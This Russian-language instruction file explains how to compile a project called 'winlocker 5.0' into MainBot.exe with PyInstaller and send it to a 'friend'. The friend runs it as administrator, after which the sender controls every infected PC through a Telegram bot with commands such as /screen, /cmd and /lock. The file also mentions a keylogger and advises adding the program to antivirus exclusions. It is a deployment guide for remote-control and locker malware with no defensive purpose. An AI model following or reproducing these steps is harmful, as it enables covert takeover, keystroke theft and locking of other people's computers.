================================================================================
  📦 СПИСОК ФАЙЛОВ ДЛЯ ОТПРАВКИ ДРУГУ
================================================================================

------------------------------------------------------------
  1. СКОМПИЛИРОВАТЬ БОТ В EXE
------------------------------------------------------------

Открой ОБЫЧНЫЙ PowerShell (НЕ в Trae IDE) и выполни:

1. Перейди в папку проекта:
   cd "c:\Users\Andrei Bobritski\OneDrive\Рабочий стол\!!!!!!!мои работы\winlocker 5.0"

2. Скомпилируй:
   py -m PyInstaller --clean main_bot.spec --noconfirm

   ИЛИ если не работает:
   python -m PyInstaller --clean main_bot.spec --noconfirm

3. Жди 2-5 минут, пока компилируется

------------------------------------------------------------
  2. ЧТО ОТПРАВИТЬ ДРУГУ
------------------------------------------------------------

Создай папку "WinLocker_Dlya_Druga" и положи туда:

✅ dist/MainBot.exe (главный файл бота)
✅ config.py
✅ secure_config.py
✅ .env (ВАЖНО! СМОТРИ ШАГ 3 НИЖЕ!)
✅ icon.ico (если есть)
✅ ДЛЯ_ДРУГА.txt (инструкция)

------------------------------------------------------------
  3. ПОДГОТОВКА .env ДЛЯ ДРУГА
------------------------------------------------------------

ОЧЕНЬ ВАЖНО! НЕ ОТПРАВЛЯЙ СВОЙ .env С ТВОИМИ ТОКЕНАМИ!

Открой файл .env и ЗАМЕНИ на:

BOT_TOKEN=ВСТАВЬ_СЮДА_ТОКЕН_ОТ_BOTFATHER
SUPER_ADMIN_ID=ВСТАВЬ_СЮДА_ТВОЙ_ID_В_TELEGRAM

Или сделай пустой .env и пусть друг вставит сам!

------------------------------------------------------------
  4. КАК ДРУГУ ПОЛУЧИТЬ ТОКЕН И ID
------------------------------------------------------------

Друг должен сделать это:

1. ТОКЕН БОТА:
   - Открой @BotFather в Telegram
   - Отправь /newbot
   - Придумай имя и username
   - Скопируй токен

2. СВОЙ ID:
   - Открой @userinfobot
   - Отправь любое сообщение
   - Скопируй ID (число)

3. ВСТАВИТЬ В .env:
   - Открыть .env в блокноте
   - Вставить токен и ID
   - Сохранить

------------------------------------------------------------
  5. КАК ДРУГУ ЗАПУСТИТЬ
------------------------------------------------------------

1. Распакуй все файлы в одну папку
2. Настрой .env (вставить токен и ID)
3. Запусти MainBot.exe ОТ ИМЕНИ АДМИНИСТРАТОРА!
4. Когда бот запустится - ты получишь сообщение в Telegram
5. Открой бота и нажми /start

------------------------------------------------------------
  6. КАК УПРАВЛЯТЬ ВСЕМИ КОМПЬЮТЕРАМИ
------------------------------------------------------------

Когда бот запустится у друга:
1. Ты получишь сообщение: "🟢 ПК [Имя компьютера друга] в сети"
2. Отправь /panel или /pc_list - увидишь все устройства
3. Выбери нужное устройство
4. Управляй им через команды (/screen, /cmd, /lock и т.д.)

------------------------------------------------------------
  ВАЖНО!
------------------------------------------------------------

✅ Все библиотеки уже внутри EXE - Python не нужен!
✅ Каждый компьютер должен иметь СВОЙ токен? НЕТ!
  ✅ Можно использовать ОДИН бот для ВСЕХ компьютеров!
  ✅ Просто каждый компьютер запускает тот же EXE
  ✅ Все устройства будут видны в одном боте!

⚠️ Кейлоггер требует прав администратора!
⚠️ Антивирус может блокировать - добавь в исключения!
⚠️ Не отправляй свой .env с токенами другу!

================================================================================
